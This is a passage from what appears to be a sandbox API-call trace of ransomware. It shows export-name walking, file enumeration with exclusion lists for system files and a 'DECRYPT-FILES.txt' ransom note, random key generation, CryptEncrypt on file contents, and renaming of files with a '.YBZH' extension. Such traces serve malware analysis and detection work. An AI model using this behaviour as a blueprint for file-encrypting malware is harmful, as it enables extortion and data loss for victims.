(lpString="DELETEATOM") returned 10 [0076.956] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0076.956] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0076.956] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0076.956] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0076.956] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0076.956] lstrlenA (lpString="DELETEFIBER") returned 11 [0076.956] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0076.957] lstrlenA (lpString="DELETEFILEA") returned 11 [0076.957] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0076.957] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0076.957] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0076.957] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0076.957] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0076.957] lstrlenA (lpString="DELETEFILEW") returned 11 [0076.957] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0076.957] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0076.957] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0076.957] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0076.957] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0076.957] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0076.957] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0076.957] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0076.957] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0076.957] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0076.957] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0076.957] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0076.957] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0076.957] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0076.957] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0076.957] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0076.957] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0076.957] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0076.957] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0076.957] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0076.957] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0076.957] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0076.957] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0076.957] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0076.957] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0076.957] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0076.957] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0076.957] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0076.957] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0076.958] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0076.958] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0076.958] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0076.958] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0076.958] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0076.958] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0076.958] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0076.958] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0076.958] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0076.958] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0076.958] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0076.958] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0076.958] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0076.958] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0076.958] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0076.958] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0076.958] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0076.958] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0076.958] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0076.958] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0076.958] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0076.958] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0076.958] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0076.958] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0076.958] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0076.958] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0076.958] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0076.958] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0076.958] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0076.958] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0076.958] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0076.958] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0076.958] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0076.958] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0076.958] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0076.958] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0076.958] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0076.958] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0076.959] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0076.959] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ajTbqxKluAP5yMsiQz.mkv") returned 68 [0076.959] wsprintfW (in: param_1=0x3f2dea4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ajTbqxKluAP5yMsiQz.mkv.YBZH") returned 73 [0076.959] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ajTbqxKluAP5yMsiQz.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\ajtbqxkluap5ymsiqz.mkv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ajTbqxKluAP5yMsiQz.mkv.YBZH" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\ajtbqxkluap5ymsiqz.mkv.ybzh"), dwFlags=0x0) returned 1 [0076.959] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.960] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.960] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.960] FindNextFileW (in: hFindFile=0x5f8c58, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3817e930, ftCreationTime.dwHighDateTime=0x1d4c771, ftLastAccessTime.dwLowDateTime=0x2abfc4a0, ftLastAccessTime.dwHighDateTime=0x1d4d514, ftLastWriteTime.dwLowDateTime=0x2abfc4a0, ftLastWriteTime.dwHighDateTime=0x1d4d514, nFileSizeHigh=0x0, nFileSizeLow=0xd84d, dwReserved0=0x0, dwReserved1=0x0, cFileName="akDBjfYtmaT.m4a", cAlternateFileName="AKDBJF~1.M4A")) returned 1 [0076.960] lstrcmpiW (lpString1="akDBjfYtmaT.m4a", lpString2="DECRYPT-FILES.txt") returned -1 [0076.960] lstrcmpiW (lpString1="akDBjfYtmaT.m4a", lpString2="autorun.inf") returned -1 [0076.960] lstrcmpiW (lpString1="akDBjfYtmaT.m4a", lpString2="boot.ini") returned -1 [0076.960] lstrcmpiW (lpString1="akDBjfYtmaT.m4a", lpString2="desktop.ini") returned -1 [0076.960] lstrcmpiW (lpString1="akDBjfYtmaT.m4a", lpString2="ntuser.dat") returned -1 [0076.960] lstrcmpiW (lpString1="akDBjfYtmaT.m4a", lpString2="iconcache.db") returned -1 [0076.960] lstrcmpiW (lpString1="akDBjfYtmaT.m4a", lpString2="bootsect.bak") returned -1 [0076.960] lstrcmpiW (lpString1="akDBjfYtmaT.m4a", lpString2="ntuser.dat.log") returned -1 [0076.960] lstrcmpiW (lpString1="akDBjfYtmaT.m4a", lpString2="thumbs.db") returned -1 [0076.960] lstrcmpiW (lpString1="akDBjfYtmaT.m4a", lpString2="Bootfont.bin") returned -1 [0076.960] lstrlenW (lpString="akDBjfYtmaT.m4a") returned 15 [0076.961] lstrcmpiW (lpString1="m4a", lpString2="lnk") returned 1 [0076.961] lstrcmpiW (lpString1="m4a", lpString2="exe") returned 1 [0076.961] lstrcmpiW (lpString1="m4a", lpString2="sys") returned -1 [0076.961] lstrcmpiW (lpString1="m4a", lpString2="dll") returned 1 [0076.961] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned 46 [0076.961] lstrlenW (lpString="akDBjfYtmaT.m4a") returned 15 [0076.961] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" [0076.961] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpString2="akDBjfYtmaT.m4a" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\akDBjfYtmaT.m4a") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\akDBjfYtmaT.m4a" [0076.961] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0076.961] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\akDBjfYtmaT.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\akdbjfytmat.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x440 [0076.961] GetFileSizeEx (in: hFile=0x440, lpFileSize=0x3f2de70 | out: lpFileSize=0x3f2de70*=55373) returned 1 [0076.961] CreateFileMappingW (hFile=0x440, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x444 [0076.961] MapViewOfFile (hFileMappingObject=0x444, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfc0000 [0076.961] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0076.961] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0076.961] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0076.962] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x10d0000*, pdwDataLen=0x3f2ddd8*=0x28, dwBufLen=0x100 | out: pbData=0x10d0000*, pdwDataLen=0x3f2ddd8*=0x100) returned 1 [0076.962] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10e0000 [0076.963] VirtualFree (lpAddress=0x10e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.963] UnmapViewOfFile (lpBaseAddress=0xfc0000) returned 1 [0076.964] CloseHandle (hObject=0x444) returned 1 [0076.964] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.964] WriteFile (in: hFile=0x440, lpBuffer=0x10d0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2ddf8, lpOverlapped=0x0 | out: lpBuffer=0x10d0000*, lpNumberOfBytesWritten=0x3f2ddf8*=0x108, lpOverlapped=0x0) returned 1 [0076.965] CloseHandle (hObject=0x0) returned 0 [0076.965] CloseHandle (hObject=0x440) returned 1 [0076.966] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.966] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.966] GetTickCount () returned 0x114bc00 [0076.966] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0076.966] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0076.967] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0076.967] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0076.967] lstrlenA (lpString="kernel32.dll") returned 12 [0076.967] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0076.967] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0076.967] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0076.967] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0076.967] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0076.967] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0076.967] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0076.967] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0076.967] lstrlenA (lpString="ADDATOMA") returned 8 [0076.968] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0076.968] lstrlenA (lpString="ADDATOMW") returned 8 [0076.968] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0076.968] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0076.968] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0076.968] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0076.968] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0076.968] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0076.968] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0076.968] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0076.968] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0076.968] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0076.968] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0076.968] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0076.968] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0076.968] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0076.968] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0076.968] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0076.968] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0076.968] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0076.968] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0076.968] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0076.968] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0076.968] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0076.968] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0076.968] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0076.968] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0076.968] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0076.968] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0076.968] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0076.968] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0076.968] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0076.968] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0076.968] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0076.968] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0076.968] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0076.969] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0076.969] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0076.969] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0076.969] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0076.969] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0076.969] lstrlenA (lpString="BACKUPREAD") returned 10 [0076.969] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0076.969] lstrlenA (lpString="BACKUPSEEK") returned 10 [0076.969] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0076.969] lstrlenA (lpString="BACKUPWRITE") returned 11 [0076.969] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0076.969] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0076.969] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0076.969] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0076.969] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0076.969] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0076.969] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0076.969] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0076.969] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0076.969] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0076.969] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0076.969] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0076.969] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0076.969] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0076.969] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0076.969] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0076.969] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0076.969] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0076.969] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0076.969] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0076.969] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0076.969] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0076.969] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0076.969] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0076.969] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0076.969] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0076.969] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0076.970] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0076.970] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0076.970] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0076.970] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0076.970] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0076.970] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0076.970] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0076.970] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0076.970] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0076.970] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0076.970] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 